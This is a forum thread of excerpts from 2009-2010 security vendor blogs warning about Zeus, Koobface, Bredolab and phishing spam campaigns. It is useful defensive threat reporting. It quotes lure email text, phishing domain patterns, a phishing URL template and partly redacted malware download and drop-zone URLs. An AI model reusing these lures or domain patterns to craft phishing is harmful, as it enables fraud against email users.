- http://blog.trendmicro.com/zbot-spam-campaign-continues/
Oct. 16, 2009 - "A slightly modified Zbot spam campaign currently making rounds pretend to come from the IT support of various companies. It informs users that a security update in the mailing service caused changes in their mailbox settings. They are instructed to open the ZIP attachment and run the .EXE file, INSTALL.EXE to supposedly apply the changes. Trend Micro detects this as TROJ_FAKEREAN.CF. When executed, this Trojan accesses http ://{BLOCKED}nerkadosa.com /xIw1yPD0q5Gb8t0br4×6k5sk to download another malicious file detected as TROJ_FAKEREAN.BI... Spammers usually employed random email address in the FROM and TO field headers but in this case, the actual company domain is used as email addresses in both fields. This is done to make the email message more credible, and convincingly coming internally from the company, thus luring unknowing users into executing the malware... The said email purports as a notification from the company’s “system administrator” to update the user’s system because of a server upgrade. Accordingly, the subdomains are tailor-made to make it more legitimate. Users are encouraged not to open suspicious-looking emails even though it supposedly came from a trusted source. It is also advisable that users contact first their IT or tech support in case they received such emails to verify if indeed a security update had occured..."
(Screenshots available at the TrendMicro URL above.)
- http://atlas.arbor.net/
"... We are also seeing email spam attacks to spread malware from the Bredolab botnet, from the ZBot botnet, and a Rogue AV downloader purporting to be an anti-conficker system update."
:fear::fear:
AplusWebMaster
2009-10-22, 22:43
FYI...
Malicious update for Outlook/Outlook Express (KB910721)
- http://www.sophos.com/blogs/sophoslabs/v/post/7044
October 22, 2009 - "... Didn’t I see this a while ago and didn’t it contain a rather nasty Trojan? The format of the October version differs slightly in that it includes a link to a website from which you may download the ‘Microsoft/Outlook/Outlook Express Update’ rather than an attached executable. The details have also been updated... Of course this is not a Microsoft security update, but rather simply another attempt by the malware authors to fool you into installing their Trojan... Visit the genuine Microsoft update site* in order to obtain your fixes."
* http://update.microsoft.com/
:fear::fear:
AplusWebMaster
2009-10-27, 12:13
FYI...
Malicious Facebook password SPAM
- http://securitylabs.websense.com/content/Alerts/3496.aspx
10.26.2009 - " Websense... has discovered a new wave of malicious email attacks claiming to be a password reset confirmation from Facebook. The From: address on the messages is spoofed using support @ facebook.com to make the messages believable to recipients. The messages contain a .zip file attachment with an .exe file inside (SHA1: d01c02b331f47481a9ffd5e8ec28c96b7c67a8c6). The .exe file currently has a detection rate of about 30 percent on VirusTotal*. Our ThreatSeeker™ Network has seen up to 90,000 of these messages sent out so far today. The malicious exe file connects to two servers to download additional malicious files and joins the Bredolab botnet which means the attackers have full control of the PC, such as steal customer information, send spam emails. One of the servers is in the Netherlands and the other one in Kazakhstan..."
* http://www.virustotal.com/analisis/963f2e1769790ae402809e8f77275a219c67de414a7fbc13d687aa8070d5f10c-1256597978
File Facebook_Password_c92dd.exe received on 2009.10.26 22:59:38 (UTC)
Result: 12/41 (29.27%)
- http://www.symantec.com/connect/blogs/trojanbredolab-making-yet-another-comeback
October 27, 2009
(Screenshot available at the Websense and Symantec URLs above.)
First Facebook, now MySpace...
- http://www.m86security.com/trace/i/First-Facebook-now-MySpace,trace.1157~.asp
October 30, 2009
:fear::mad:
AplusWebMaster
2009-10-28, 11:08
FYI...
FDIC alert NOT...
- http://sunbeltblog.blogspot.com/2009/10/fdic-alert-not.html
October 27, 2009 - "Malicious SPAM. Don’t go there. Zeus Trojan..."
- http://ddanchev.blogspot.com/2009/10/ongoing-fdic-spam-campaign-serves-zeus.html
October 27, 2009
(Screenshots available at both URLs above.)
- http://www.fdic.gov/consumers/consumer/alerts/index.html
October 26, 2009 - "... This e-mail and associated Web site are fraudulent. Recipients should consider the intent of this e-mail as an attempt to collect personal or confidential information, some of which may be used to gain unauthorized access to on-line banking services or to conduct identity theft. The FDIC does -not- issue unsolicited e-mails to consumers..."
- http://blog.trendmicro.com/fdic-spam-points-to-info-stealer/
Oct. 27, 2009 - "... same cybercriminals responsible for other spam campaigns like the CapitalOne phishing attack and the Outlook update spam... characteristics of the domains (fast-flux and character patterns), URLs (wildcarded subdomains, long URLs), and binaries (Zeus) used in FDIC spam are somewhat similar to the above-mentioned spam waves..."
- http://www.us-cert.gov/current/#federal_deposit_insurance_corporation_warns
October 27, 2009
:fear::mad:
AplusWebMaster
2009-11-02, 18:08
FYI...
Worms return - MS SIR report...
- http://www.theregister.co.uk/2009/11/02/microsoft_security_report/
2 November 2009 - "Microsoft's latest security intelligence report* shows a resurgence in worms, although rogue security software also remains a big issue. Rogue security software was found and removed from 13.4m machines, compared to 16.8m last time. It is still an issue but numbers are falling. Worm figures doubled in the first six months of 2009 - from fifth to second. The focus on worms is partly to do with attention given to Conficker which infected 5.2m machines. Taterf doubled to 4.9m compared to the second half of 2008. Taterf is a worm aimed at massive multi-player games. It spreads via USB drives and mapped drives. Surprisingly it appears in enterprise space rather than consumer space - presumably by people sticking USB sticks into work machines... Cliff Evans, head of security and privacy at Microsoft, advised consumers to keep automatic updates on, keep a firewall running and use one of the newest browsers and up to date anti-malware. He said it was important to check all your software, not just Microsoft's... Microsoft works out the infection rate per thousand machines. The worldwide average is 8.7, Japan, Austria, Germany run at about 3 and the UK 4.9, down from 5.7. In the US the figure is 8.6. The top worm in the UK is koobface which spreads via Facebook and MySpace. It has been around a while but infection is increasing. Microsoft publishes this report every six months..."
* http://www.microsoft.com/security/portal/Threat/SIR.aspx
:fear::mad::fear:
AplusWebMaster
2009-11-03, 17:27
FYI...
Opachki hijacker trojan analysis
- http://www.secureworks.com/research/threats/opachki/
November 02, 2009 - "Opachki is one of many software tools developed by criminals to hijack and monetize Windows users' search traffic using affilate-based search engines that are ultimately advertiser-sponsored, sometimes by well-known and respected firms. Each search-hijacking-by-malware scheme... so far seems to have a different twist, and the Opachki trojan is no different. Instead of only hijacking search result links, Opachki attempts to hijack as many links as it can on any web page, using the text enclosed by the HTML HREF tag as a faux search phrase when redirecting the user to an affiliate-based search engine. Opachki carries out this link hijacking using a small bit of JavaScript code that is injected into the top of HTML pages... Opachki demonstrates that even a "benign" threat such as a search/link hijacker has additional risks and costs that sometimes go unseen. For this reason, any trojan infection should be quickly resolved. Manual removal of Opachki is extremely difficult, given the many methods it uses to maintain its code on a system. Because of these difficulties and also because of other unknown trojans, worms or viruses Opachki may have downloaded, the recommended method of removal is to reformat and reinstall the operating system from known good media."
- http://isc.sans.org/diary.html?storyid=7519
Last Updated: 2009-11-03 12:46:11 UTC - "... prevents the system from booting in Safe Mode – the attackers did this to make it more difficult to remove the trojan. This goes well with what I've been always saying – do not try to clean an infected machine, always reimage it. As Opachki's main goal is to hijack links, it hooks the send and recv API calls in the following programs: FIREFOX.EXE, IEXPLORE.EXE, OPERA.EXE and QIP.EXE. While the first three are well known, I had to investigate the last one. It turned out that QIP.EXE is an ICQ client that is very popular in Russia, so the trojan has a component that directly attacks Russian users. The trojan will monitor web traffic (requests and responses) that above mentioned applications make and will inject a malicious script tag into every response..."
(More detail available at both URL's above.)
:mad::fear::mad:
AplusWebMaster
2009-11-05, 14:01
FYI...
FBI investigates $100 million in losses from spear phishing
- http://sunbeltblog.blogspot.com/2009/11/fbi-investigates-100-million-in-losses.html
November 04, 2009 - "The FBI has said it is investigating thefts in the last five years of more than $100 million from small and medium sized businesses that fell victim to spear-phishing attacks which siphoned funds from their bank accounts. There are more of the attacks reported each week, they said. The attacks typically involved malware sent by email that installed key loggers and targeted someone in the company who could initiate fund transfers. The criminals used the key loggers to capture the victim’s banking log-in information then initiated fund transfers to money mules, generally in amounts below $10,000 – the level that triggers currency transaction reporting. The mules transfer the funds to the criminals via Western Union or other international money transfer systems. The phishing emails were sent from groups or people known to the victims so they wouldn’t be inclined to consider them fraudulent. Among other measures, the FBI suggests removing the company organization chart from web sites in order to preclude spear-phishing emails that target company financial personnel...". Report here*.
* http://www.ic3.gov/media/2009/091103-1.aspx
November 3, 2009
:fear::fear:
AplusWebMaster
2009-11-09, 17:00
FYI...
Koobface abuses Google Reader pages
- http://blog.trendmicro.com/koobface-abuses-google-reader-pages/
Nov. 9, 2009 - "We are seeing another development from the Koobface botnet, this time abusing the Google-owned service Google Reader to spam malicious URLs in social networking sites such as Facebook, MySpace, and Twitter. The Koobface gang used controlled Google Reader accounts to host URLs containing an image that resembles a flash movie. These URL are spammed through the said social networks. When the user clicks the image or the title of the shared content, it leads to the all too familiar fake YouTube page that hosts the Koobface downloader component... This sharing of content to the public is what the cybercriminals abused to use the Google Reader domain in spamming malicious links. We have already contacted Google about this matter to remove the malicious content. As of now we’ve found 1,300 Google Reader accounts used for this attack..."
(Screenshots available at the URL above.)
Malicious Google AppEngine Used as a CnC
- http://asert.arbornetworks.com/2009/11/malicious-google-appengine-used-as-a-cnc/
November 9, 2009
- http://www.f-secure.com/weblog/archives/00001815.html
November 9, 2009 - "... there are these apparent MySpace phishing e-mails going around ("...please be informed that you are required to update your MySpace account, Please update your MySpace account by clicking here..."). When you follow the link, you end up to this MySpace look-a-like page, hosted on various .uk domains... Why do they want them? So they can pose as you on MySpace and send malicious links to your friends — who will surely follow them, as they know you and trust you. But in this case, this is not the only thing they are after. After logging on, you get this prompt... A New MySpace Update Tool? Really? As an executable file? Hmm… and of course it's not. The file (md5: 4c7693219eaa304e38f5f989a8346e51) turns out to be yet another Zeus / Zbot banking trojan variant..."
(Screenshots available at the F-secure URL above.)
Zeus Malware Moves to Myspace
- http://garwarner.blogspot.com/2009/11/zeus-malware-moves-to-myspace.html
November 09, 2009 - "... The newest campaign follows the model of last week's Facebook UpdateTool*, only now targeting MySpace users..."
* http://garwarner.blogspot.com/2009/10/facebook-phish-users-beware.html
October 28, 2009
:fear::mad:
AplusWebMaster
2009-11-14, 00:20
FYI...
Conficker patch via email - NOT
- http://isc.sans.org/diary.html?storyid=7591
Last Updated: 2009-11-13 20:16:53 UTC - "Microsoft does -not- send patches, updates, anti-virus, or anti-spyware via email (hopefully ever)... in my inbox this aft. The subject was: Conflicker.B Infection Alert
"Dear Microsoft Customer,
Starting 12/11/2009 the ‘Conficker’ worm began infecting Microsoft customers unusually rapidly. Microsoft has been advised by your Internet provider that your network is infected.
To counteract further spread we advise removing the infection using an antispyware program. We are supplying all effected Windows Users with a free system scan in order to clean any files infected by the virus.
Please install attached file to start the scan. The process takes under a minute and will prevent your files from being compromised. We appreciate your prompt cooperation.
Regards,
Microsoft Windows Agent #2 (Hollis)
Microsoft Windows Computer Safety Division"
* https://www.virustotal.com/analisis/5d8caa7c9baaed6242e3842e0dafea5056f41d9c99732f0fd2961bedff647ae5-1258134283
File 3YMH6JJY.zip received on 2009.11.13 17:44:43 (UTC)
Result: 11/41 (26.83%)
:fear::mad::fear:
AplusWebMaster
2009-11-14, 20:43
FYI...
Bogus ‘Balance Checker’ tool carries malware
- http://blog.trendmicro.com/bogus-balance-checker-tool-carries-malware/
Nov. 14, 2009 - "... received samples of spammed messages that purports to come from mobile phone companies, Vodafone and Verizon Wireless. The email messages carry the subject, “Your credit balance is over its limits” and inform users that their credit balance is due. To be able to review the payments, users should employed the balance checker tool attached in the email... When users opened the attached .ZIP file, they won’t find any ballance checker tool and instead will get a malicious file (balancechecker.exe) detected by Trend Micro as TSPY_ZBOT.SMP. TSPY_ZBOT.SMP steals online banking credentials such as usernames and passwords. This stolen information may be used by cybercriminals for other fraudulent activities. It also disables the Windows Firewall and has rootkit capabilities for difficult detection and removal. Users are strongly advised not to open any suspicious-looking emails even it comes from a known source. It also good to verify first any email coming from your mobile services provider just to be sure if it is legitimate or not..."
:fear::mad::fear:
AplusWebMaster
2009-11-16, 19:41
FYI...
Online criminals cash in on swine flu
- http://www.sophos.com/blogs/gc/g/2009/11/16/swine-flu-fears-making-millionaires-russian-hackers/
November 16, 2009 - "As the number of reported swine flu cases climbs, it's time a strong message was sent out against buying Tamiflu over the internet. Research published by Sophos* exposes the profit model of the Russian cybercriminals making millions of pounds from counterfeit Tamiflu. Panic-induced stockpiling by individuals who aren't officially classified as being at risk of contracting swine flu, and therefore anxious they won't receive Tamiflu from the NHS, will not only line cybercriminals' pockets with millions of pounds in cash but also grant them access to sensitive personal data to be used for other crimes... The criminal gangs working behind the scenes at fake internet pharmacies are putting their customers' health, personal information and credit card details at risk. They have no problem breaking the law to promote these websites, so you can be sure they'll have no qualms in exploiting your confidential data or selling you medications which may put your life in danger. If you think you need medication contact your real doctor, and stay away from quacks on the internet..."
* http://www.sophos.com/sophos/docs/eng/marketing_material/samosseiko-vb2009-paper.pdf
"... The ‘Canadian Pharmacy’ group now holds the number one position in the Spamhaus Top 10 spammers list... Searching for GlavMed’s support number reveals over 120,000 online pharmacy sites..."
:fear::mad::fear:
AplusWebMaster
2009-11-18, 15:07
FYI...
Payment Request SPAM contains malware
- http://blog.trendmicro.com/payment-request-spam-contains-malware/
Nov. 18, 2009 - "TrendLabs researchers received spammed messages purporting to have come from various companies such as eBay, J.P. Morgan Chase and Co., and Colgate-Palmolive, among others. The email bore the subject, “Payment request from,” and informs users about a certain recorded payment request... The spammed message even gave users two options—to either ignore the email if the payment request has been made or to download the attached .ZIP file and install the inspector module to decline the said payment request. If the user does not make any transaction, he/she still needs to download the attachment just to cancel the payment request. The attached .ZIP file is, of course, not an inspector module but an .EXE file (module.exe) detected by Trend Micro as TROJ_AGENTT.WTRA. Users are advised to be wary before opening -any- attached files even if they come from known sources. It is also best to verify emails you receive from any company first just to be sure it is legitimate..."
(Screenshots available at the URL above.)
:mad:
AplusWebMaster
2009-11-21, 14:18
FYI...
FDA targets online pharmacy counterfeits
- http://www.theregister.co.uk/2009/11/20/fda_online_pharmacy_action/
20 November 2009 - "The US Food and Drug Administration said it has completed a sweep of illegal online pharmacies that targeted 136 websites that appeared to be illegally selling drugs to American consumers... Websites peddling Viagra, steroids and other pharmaceuticals have emerged as a major source of spam over the past few years. In addition to clogging inboxes, the sites can put customers' health at risk because the drugs are frequently counterfeits. According to a study released in August, almost 90 percent of online drugstores advertised on Microsoft's Bing search engine violated federal and state laws... The FDA said the notices* sent to service providers and registrars may give them grounds to terminate service to their customers."
* http://www.fda.gov/NewsEvents/Newsroom/PressAnnouncements/ucm191330.htm
> http://www.fda.gov/ForConsumers/ConsumerUpdates/ucm048396.htm
- http://forums.spybot.info/showpost.php?p=347295&postcount=174
:fear::mad:
AplusWebMaster
2009-11-26, 01:02
FYI...
SPAM/phish/malware Zbot all-in-one
- http://www.pcgenius.com/uncategorized/red-condor-warns-of-aggressive-malware-attack/
November 24, 2009 — "Email security experts at Red Condor issued a warning about the latest spam campaign that contains a phishing ploy and a malware threat. The email requests that recipients click on a link in the body of the email to update the “security mode” of their email box. Users that click on the link are taken to a web site that recommends that they update to the latest version of the Macromedia Flash Player by downloading “flashinstaller.exe.” The executable is actually a banking Trojan that is known to disable firewalls, steal sensitive financial data and provide hackers with remote access capabilities. The malware is more commonly known as Win32:Zbot-MGA (Avast), W32/Bifrost.C.gen!Eldorado (F-Prot), PWS-Zbot.gen.v (McAfee) or PWS:Win32/Zbot.gen!R (Micorsoft). The spam campaign was detected late on November 20, 2009, and within the first six hours, Red Condor had blocked more than 500,000 emails..."
:fear:
AplusWebMaster
2009-11-27, 15:52
FYI...
Another ZBOT SPAM run
- http://blog.trendmicro.com/another-zbot-spam-run/
Nov. 27, 2009 - "... another ZBOT spam campaign. The emails bear subjects such as “your photos” and “some jerk has posted your photos.” They inform the recipients that someone has posted their photos without their permission on a site and has sent the link to their friends. The recipient is intended to believe that the “sender” is acting as a “good samaritan,” emailing the one who supposedly posted the said pictures. The URL, of course, points to a website that distributes a malware detected by Trend Micro as TSPY_ZBOT.CJA... When executed TSPY_ZBOT.CJA connects to several websites to download another malicious file detected as TROJ_DROPR.KB. The spyware also has rootkit capabilities that enable it to hide its processes. ZBOT/ZeuS is one of the most notorious botnets with regard to identity, financial, and information theft. Users are strongly advised not to open emails from unknown sources..."
(Screenshots available at the URL above.)
:fear::fear:
AplusWebMaster
2009-11-30, 17:10
FYI...
Koobface using Christmas theme
- http://securitylabs.websense.com/content/Alerts/3505.aspx
11.30.2009 - "Websense... has discovered that the Koobface malware campaign is now using a Christmas theme. Recent developments by Koobface have included use of Google Reader. The Koobface Web site offers a video posted by 'SantA'. The usual ruse of requiring a codec to watch the video is used, to encourage the user to install and run a file called setup.exe (SHA1:a2046fc88ab82abec89e150b915ab4b332af924a). This file is currently detected by 16 out of 41 antivirus products according to VirusTotal*. On the compromised Facebook page the user is presented with a link to ch[removed]cher .ch which is a compromised site in Switzerland. The user is -redirected- to one of several Koobface Web sites through a malicious Flash movie file hosted on the compromised site. If the user runs the infected file, the worm will automatically login to their Facebook, Myspace, and several other social networking sites and send messages to all their friends..."
* http://www.virustotal.com/analisis/59d6f355cfeba6684dd03954e84615cbb79def11e40b1f69cd4275645b8e48af-1259587988
File setup.exe received on 2009.11.30 13:33:08 (UTC)
Result: 16/41 (39.02%)
(Screenshots available at the Websense URL above.)
:fear::mad:
AplusWebMaster
2009-12-02, 13:31
FYI...
Zeus bot SPAM fakes CDC request
- http://www.symantec.com/connect/blogs/zeus-trojan-catches-swine-flu
December 1, 2009 - "... the Zeus bot crew... latest offering comes in the guise of an email purporting to come from the CDC (Center for Disease Control). The email contains a link to a bogus Web page that is made to look like an official CDC page... The content of the page asks you to create a profile that will then enable you to get the H1N1 flu vaccine... The subject lines used in the emails are quite variable; for example, the following have been seen:
• Instructions on creation of your personal Vaccination Profile
• Governmental registration program on the H1N1 vaccination
• Your personal Vaccination Profile
The domain used in these email links has the format of online.cdc.gov.[RANDOM CHARS].[TLD NAME].im
For example:
• online.cdc.gov.yhnbad.com.im
• online.cdc.gov.yttt4r.org.im
• online.cdc.gov.yhnbam.co.im
As is usually the case with these campaigns, the URL that is supposed to be a document actually leads to an executable file. This one is named vacc_profile.exe* and is detected by Symantec as Infostealer.Banker.C. Incidentally, the URL is also “personalized” with the email address of the recipient to make it look that little bit more authentic and less like mass-mailed spam..."
(Screenshots available at the Symantec URL above.)
- http://ddanchev.blogspot.com/2009/12/pushdo-injecting-bogus-swine-flu.html
December 02, 2009
* http://www.virustotal.com/analisis/4f1a5551a5fec27950ad99b6c63d568c7c712577121e6b1aa4cdf1ec7549c227-1259719511
File vacc_profile.exe received on 2009.12.02 02:05:11 (UTC)
Result: 14/41 (34.15%)
- http://www.threatexpert.com/report.aspx?md5=5767b2c6d84d87a47d12da03f4f376ad
1 December 2009
- http://www.us-cert.gov/current/#h1n1_malware_campaign_circulating
December 2, 2009
:fear::mad:
AplusWebMaster
2009-12-10, 21:17
FYI...
Malware - Facebook pwd reset SPAM
- http://isc.sans.org/diary.html?storyid=7729
Last Updated: 2009-12-10 18:09:17 UTC - "... email today purporting to be from Facebook, which of course had an attachment. The file was Facebook_Password_833fd.zip*, which unzipped to be Facebook_Password_833fd.exe. The zip file is in fact a zip file, and the exe is in fact MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit (according to the file command). The subject line is "Facebook Password Reset Confirmation. Customer Support"... Which is an attempt to get you to first open the attachment, unzip the file, and then run the executable content... First set of Virustotal results were 20/41 today at 01:30:12 (UTC) https://www.virustotal.com/analisis/af6abaa7d0a29cdd4cf2680771d6d87e22d190a6a293572910ab89bd0653b322-1260408612 when I ran it again at 17:49:06 (UTC) they were up to 26/41 detection. It is a dropper which subsequently downloads and executes other badness.
Facebook does not send out passwords in attached files. If you have forgotten your password on Facebook reset it here: http://www.facebook.com/reset.php if you cannot login to your account (someone else has taken it over) go to this page: http://www.facebook.com/help.php?topic=login, which also has this advisory on it:
"Fake password reset emails
Some users have received fake password reset emails with attachments that contain viruses. Do not click on these emails or download the attachment. Also, please note that Facebook will -never- send you a new password as an attachment. To learn more visit our Security page:
http://www.facebook.com/security ..."
:mad::mad::mad:
AplusWebMaster
2009-12-12, 23:54
FYI...
Phish for FTP pwd's...
- http://www.symantec.com/connect/blogs/phishing-wave-sniff-ftp-credentials
December 11, 2009 - "... attackers are targeting the FTP credentials of websites. The messages appear to come from various trusted Web hosting providers. So far we have observed that users of over 100 Web hosting providers are being targeted by this attack. The attackers asks users to click on the link provided in the spam message, which will lead the users to open an “FTP access confirmation” page where the FTP credentials of the recipients are stolen. Attackers use a phishing cPanel page to do this (cPanel* is a Web hosting administration tool)... The phishing URL contains a user’s email address and the domain name of a Web hosting service provider. Once FTP credentials are entered and submitted by clicking the “Confirm FTP Access” button, users are directed to their hosting site that is specified in a “service=” tag. Example:
http ://cpanel.[removed]. me.uk/scripts/cpanel-ftp-confirmation.php?session=[removed]&email=[removed]&service=[hosting domain name]
Giving up FTP details may lead to a further loss of confidential data, the hosting of illegal websites (child pornography sites, phishing sites, etc.), and/or delivery of malware to the victim's computer by the attacker..."
* http://www.cpanel.net/
:fear:
Visa targeted by ZBOT phish/SPAM
- http://blog.webroot.com/2009/12/11/visa-targeted-again-by-zbot-phishers/
December 11, 2009 - "... targeting Visa with a fake email alert that leads to a page hosting not only a Trojan-Backdoor-Zbot installer, but that performs a drive-by download as well. This is the second time in less than a month that malware distributors have targeted Visa... we saw a similar scam involving links to bunk Verified By Visa Web pages... malware distributors are using fraudulent transaction warnings as a method to infect users with a keylogger capable of stealing their credit card information when the victim enters it into a shopping Web site, but Visa doesn’t issue these kinds of warnings—the Visa-card-issuing bank warns customers of suspected fraud themselves, and they never do anything with that level of urgency via email... As in earlier iterations of this scam, Zbot isn’t just interested in transaction details or Website logins. Zbot also steals the login credentials for virtually every Windows FTP client application — the tools that Web designers and other website administrators use to upload files to Web sites. FTP logins are far more valuable, because it gives the malware distributors another means to spread their code onto the Web. If you’ve been wondering why so many otherwise legitimate Web sites seem to be getting hacked, and having malicious code uploaded to Web sites belonging to small businesses, private individuals, and others, this is why: Zbot is taking those passwords, and handing them off to people who trade not only in malicious code, but in abusing the good reputations of legitimate Website owners or the people who help manage them.
Don’t be a victim: Don’t follow the link in the message. Don’t download the “statement” on the page. If you see a page that looks like the screen above*, immediately kill your browser and scan your computer for Zbot. The drive-by download component of this scam means you could be infected merely by visiting the page using a vulnerable browser. Most importantly, if you suspect a credit card fraud report email may be real, pick up the telephone and call the number on the back of your card."
* Screenshot available at the Webroot URL above.
M86 Security
- http://www.m86security.com/labs/i/Pushdo-Distrubuting-Malicious-VISA-Statements,trace.1207~.asp
December 14, 2009
:fear::mad::fear:
AplusWebMaster
2009-12-15, 19:49
FYI...
ZBOT targets Facebook again (with SPAM)
- http://blog.trendmicro.com/zbot-targets-facebook-again/
Dec. 15, 2009 - "ZBOT has currently been spotted engaging in another spam run targeting Facebook yet again. By clicking the link embedded in the email, users will land on a Facebook phishing page. This time, however, the phishing page contains an iframe that points to a Web exploit toolkit. This exploit toolkit can deliver a variety of exploits, depending upon the user’s browser and OS. For users of Firefox, the toolkit will push a .PDF file (detected by Trend Micro as TROJ_PIDIEF.PAL) to exploit a known vulnerability in Collab.getIcon. If the user is not infected via the exploit toolkit, ZBOT is still left with the social engineering aspect. After a user enters credentials into the phishing page, the user is led to a download page of updatetool.exe -or- the ZBOT binary (detected as TSPY_ZBOT.CCB)..."
(Screenshot available at the URL above.)
DHL - SPAM appears to have come from known courier DHL
- http://blog.trendmicro.com/bredolab-regifts-old-spam/
Dec. 15, 2009 - "BREDOLAB set out on a spam rerun just in time for the holidays. This recent run is similar to the laptop delivery note spam run we reported in August. This time, however, the spammed message appears to have come from known courier, DHL. The spammed message makes it appear as though the users have received a notification from DHL, alerting them about an error in shipping a certain package. The message also prompts the users to open an attached file. The attached file DHL_package_label_cfb35.exe is detected as TROJ_BREDOLAB.CB. The dynamics of this spam run, although relatively old and simple, could still pack a punch, especially now that we are well within that part of the holiday season where most people do their gift shopping. People who may have purchased a laptop online and are expecting it to come through the mail are prone to being victimized by this attack..."
(Screenshot available at the URL above.)
:fear::mad::fear:
AplusWebMaster
2009-12-26, 17:27
FYI...
SPAM - Christmas e-cards...
- http://blog.trendmicro.com/christmas-greetings-from-spammers/
Dec. 25, 2009 - "Spammers are clearly putting the holidays to (their) good use, as they have made Christmas just another reason to spread malware. Trend Micro threat analysts recently received a spammed message purporting to come from 123greetings.com, a legitimate site that users can access to send e-cards to family and friends. The email message even sported the site’s logo... However, upon further investigation of the spammed message’s header, we noticed that the sender’s IP address did not match that of the legitimate 123greetings.com site... The spammed message urges the user to download and open the .ZIP file attachment, which is actually an .EXE file detected by Trend Micro as WORM_PROLACO.Z, in order to view the greeting card... To keep your system malware-free this festive season, do -not- open unsolicited email messages..."
(Screenshots available at the URL above.)
:fear::mad:
AplusWebMaster
2009-12-30, 00:27
FYI...
Fox Sports site - injected with malicious code
- http://securitylabs.websense.com/content/Alerts/3516.aspx?
12.29.2009 - Malicious Web Site / Malicious Code - "Websense... has detected that the Fox Sports site has been compromised and injected with malicious code... Our research shows that the site has been injected with two pieces of malicious code. One of them is the latest Gumblar campaign, and the other redirects individuals to a malicious Web site, whose link was unreachable at the time of this alert. The ThreatSeeker Network has detected that thousands of Web sites have been compromised by the latest Gumblar campaign. The Gumblar page is highly obfuscated. After deobfuscation, the page uses PDF and Flash exploits to run malware in order to control a victim's computer. In addition, a piece of VBScript is executed to download malware..."
(Screenshots available at the Websense URL above.)
:fear::mad::fear:
AplusWebMaster
2010-01-02, 07:27
FYI...
New year related malware...
- http://www.f-secure.com/weblog/archives/00001847.html
December 31, 2009 - "The first signs of New Year malware for this year were already sighted a while back, but the current one we're seeing in circulation wishes "Happy New Year 2010" and points to a fast flux domain site which serves up Trojan-Downloader:W32/Agent.MUG. This particular trojan will try to install further malware, though the content it's pointing to seems to not yet be online, at least at the time of this post. Be careful when reading electronic happy New Year's wishes also this year..."
:fear::mad:
AplusWebMaster
2010-01-05, 18:57
FYI...
SCAM spreading on Facebook and SEO...
- http://securitylabs.websense.com/content/Alerts/3518.aspx?
01.05.2010 - " Websense... has discovered several spam messages on Facebook that trick the user into visiting BINSSERVICESONLINE(dot)INFO. When the link in the message is clicked, the Web site -redirects- the user to an online scam site similar to the one we published in the blog Google Scam Kits* in mid-December. The use of Facebook to distribute links that lead to Google scam kits is fairly new, and is sure to trick some users into buying the kits. A lot of users have apparently received this message, as it quickly became a popular search string on Google. As we've seen in the past, there are criminal groups monitoring the popular search terms on Google and other search engines to start their own malicious attacks, so it didn't take long until we started seeing Google search results for BINSSERVICESONLINE leading to rogue AV products. Note that the two attacks are done by separate groups of criminals. One group started the spam attacks on Facebook and another started manipulating Google results..."
* http://securitylabs.websense.com/content/Blogs/3512.aspx
(Screenshots available at the Websense URL above.)
:fear::mad:
AplusWebMaster
2010-01-11, 01:01
FYI...
Outlook Web Access SPAM Campaign...
- http://isc.sans.org/diary.html?storyid=7918
Last Updated: 2010-01-08 21:57:40 UTC ...(Version: 3) - "... an email campaign targeting OWA users that leads to malware infections... When you review the SPAM, notice the link that is displayed shows it is from our.org but the actual hyper link is to our.org .molendf.co .kr... traced the IP and am blocking it so if others get through the SPAM filter our users will not be able to get to the site... submitted the file to VirusTotal* to see what they found and it is very new..."
* http://www.virustotal.com/analisis/26efaeec869a31abb49fdcc6ef82207f1234f92b73de01589e8294a053f31d7b-1262953493
File settings-file.exe received on 2010.01.08 12:24:53 (UTC)
Result: 16/41 (39.02%)
Outlook Web Access Themed Spam Campaign Serves Zeus Crimeware
- http://ddanchev.blogspot.com/2010/01/outlook-web-access-themed-spam-campaign.html
UPDATED: January 10, 2010
Don't Update Your Email Settings
- http://www.m86security.com/labs/i/Don-t-Update-Your-Email-Settings,trace.1215~.asp
January 10, 2010
:fear::mad:
AplusWebMaster
2010-01-11, 18:19
FYI...
Bogus IRS W-2 form leads to malware
- http://blog.trendmicro.com/bogus-irs-w-2-form-leads-to-malware/
Jan. 11, 2010 - "... spammers now are capitalizing on the upcoming tax season. Recently, Trend Micro threat analysts found spammed messages purporting to come from the Internal Revenue Service (IRS). The spammed message bears the subject, “W-2 Form update,” and informs users to update the said form because of supposed “important changes.” The W-2 form states an employee’s annual salary and total tax. The spammed message looks normal since the URLs and phone numbers in it are legitimate. This was probably done so users will not suspect anything. It also encourages users to open the attached .RTF file (Update.doc), which is supposed to be the W-2 form. When users open the .RTF file, however, they will see an embedded .PDF file. This supposedly PDF file is actually an .EXE file that uses the PDF icon. This is detected by Trend Micro as BKDR_POISON.BQA. BKDR_POISON.BQA is a component of the Darkmoon Remote Administration Tool (RAT), which enables a malicious user to execute commands on the affected system. Interestingly, this backdoor attempts to connect to a private IP address (192.168.29.1). This may be the attacker’s misconfiguration, or an attack targeting a specific internal network environment... Users are strongly advised not to open any suspicious-looking emails even though they came from a supposedly known source. It is also recommended that users verify with IRS if the email they received is legitimate or not..."
(Screenshots available at the TrendMicro URL above.)
- http://www.viruslist.com/en/weblog?weblogid=208188001
January 07, 2010
- http://www.us-cert.gov/current/#irs_warns_of_online_scams
January 13, 2010 - "... The U.S. Internal Revenue Service has issued a news release* on its website warning consumers about potential scams. These scams are circulating via fraudulent email or other online messages appearing to come from the IRS. They attempt to convince consumers to reveal personal and financial information that can be used to gain access to bank accounts, credit cards, and other financial institutions..."
* http://www.irs.gov/newsroom/article/0,,id=217794,00.html
:fear::mad:
AplusWebMaster
2010-01-13, 15:16
FYI...
40 trillion SPAM messages were sent in 2009...
- http://www.symantec.com/connect/blogs/2000-2009-spam-explosion
January 12, 2010
(Interesting 2001-2009 Growth chart available at the URL above.)
:confused: :sad:
AplusWebMaster
2010-01-14, 15:12
FYI...
Banker Scams - SPAM...
- http://blog.trendmicro.com/banker-scams-new-spam-victims/
Jan. 14, 2010 - "Two new spam campaigns spreading variants of the BANKER family of identity-stealing Trojans have recently emerged. The first campaign features spammed messages containing malicious links to supposed pictures. Once clicked, however, users ended up with TSPY_BANKER.OCN infections. This campaign made use of standalone files... The second campaign was more elaborate, as the involved malware (detected as TSPY_BANKER.MTX) had two components - one steals banking-related information while the other steals email account information... Both campaigns may, however, be related, as the information they steal from users end up in drop zones that are hosted on the same Web server:
* {BLOCKED}unicaobr .com/phps/procopspro .php
* {BLOCKED}unicaobr .com/working/lisinho .php
